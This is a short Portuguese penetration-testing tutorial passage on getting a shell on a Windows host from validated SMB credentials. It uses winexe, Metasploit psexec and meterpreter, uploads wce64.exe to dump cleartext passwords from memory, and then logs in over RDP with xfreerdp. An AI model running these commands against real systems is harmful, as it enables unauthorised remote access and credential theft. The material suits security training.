Obtendo shell no host

Vamos supor que o TS não esteja habilitado e só conseguimos validar o SMB. Podemos utilizar as credenciais para obter acesso e executar comandos no servidor. Para isso vamos utilizar o winexe.

winexe -U <usuario>%<senha> //<ip servidor> cmd.exe

Ou podemos utilizar o módulo do metasploit chamado psexec.

msf > search psexec

Após conseguir um meterpreter podemos fazer o upload do wce64.exe e buscar as informações em memória.

upload usr/share/windows-resources/wce/wce64.exe c:

C:\>wce64.exe -w

Após isso, se tivermos sucesso descobrindo alguma outra senha, podemos utilizar o xfreerdp para fazer o login.

xfreerdp /u:<usuário adm> /p:<senha adm> /v:<host>